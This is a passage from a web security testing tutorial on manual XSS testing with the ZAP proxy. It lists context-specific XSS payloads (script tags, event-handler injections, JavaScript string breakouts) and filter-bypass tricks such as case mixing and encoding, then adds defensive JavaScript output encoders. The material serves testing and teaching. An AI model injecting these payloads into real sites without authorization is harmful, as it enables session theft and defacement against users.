Manual XSS Testing Strategies
Manual testing excels at finding complex XSS variants that automated scanning misses. Use ZAP's proxy to intercept requests containing user input. Start with basic payloads to understand application filtering. When basic payloads fail, analyze how the application modifies input. This analysis guides crafting bypasses specific to the application's filtering logic.
Context-aware payload crafting improves manual testing success. Identify where user input appears in responses: HTML body, attributes, JavaScript strings, or CSS. Each context requires specific payloads. HTML contexts might use <svg onload=alert(1)>, while JavaScript strings need ';alert(1);//. Understanding output context enables precise payload selection rather than blind payload spraying.
// Context-Specific XSS Payloads
// HTML Body Context
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
// HTML Attribute Context
" onmouseover="alert(1)
' autofocus onfocus='alert(1)'>
// JavaScript String Context
';alert(1);//
\';alert(1);//
</script><script>alert(1)</script>
// JavaScript Template Literal
${alert(1)}
// CSS Context
</style><script>alert(1)</script>
expression(alert(1))
Filter bypass techniques evolve constantly as applications implement new defenses. When direct script injection fails, try HTML entity encoding, Unicode variations, or case mixing. Some filters block "script" but allow "ScRiPt" or "scrip%74". Others filter angle brackets but allow their encoded equivalents. Building a personal bypass technique library accelerates manual testing.
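The defensive side of the context list and the filter-bypass paragraph above, as an added example that is not part of the original article: a naive keyword blacklist of the kind the text describes, beside per-context output encoders that render the article's own payloads inert regardless of case mixing or vector. The function names are this example's own.

```javascript
// Naive keyword blacklist of the kind the article warns about: it strips the
// literal lowercase <script> tag and nothing else, so case mixing and
// non-script vectors (svg/img event handlers) pass straight through.
function naiveBlacklist(input) {
  return input.replace(/<\/?script>/g, "");
}

// Context-specific output encoders, the defensive counterpart of the
// context-specific payload list. Each turns the characters that would
// terminate or change the current context into inert escape sequences.
function encodeForHtmlBody(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Attribute context: every non-alphanumeric character becomes a numeric
// entity, so no quote can close the attribute and start an event handler.
function encodeForHtmlAttribute(s) {
  return s.replace(/[^A-Za-z0-9]/g, c => `&#x${c.charCodeAt(0).toString(16)};`);
}

// JavaScript string context: \xHH / \uHHHH escapes keep quotes, backslashes
// and "</script>" from breaking out of the literal or the script block.
function encodeForJsString(s) {
  return s.replace(/[^A-Za-z0-9]/g, c => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? `\\x${code.toString(16).padStart(2, "0")}`
      : `\\u${code.toString(16).padStart(4, "0")}`;
  });
}

// Place untrusted input into the named context using the matching encoder
// (constructed templates; the context names are this example's own).
function renderSafely(context, input) {
  switch (context) {
    case "html":      return `<p>${encodeForHtmlBody(input)}</p>`;
    case "attribute": return `<input value="${encodeForHtmlAttribute(input)}">`;
    case "js":        return `<script>var q = '${encodeForJsString(input)}';</script>`;
    default: throw new Error(`unknown context: ${context}`);
  }
}
```

Running the article's payloads through naiveBlacklist shows them surviving unchanged, while renderSafely leaves no raw context-terminating character in the output.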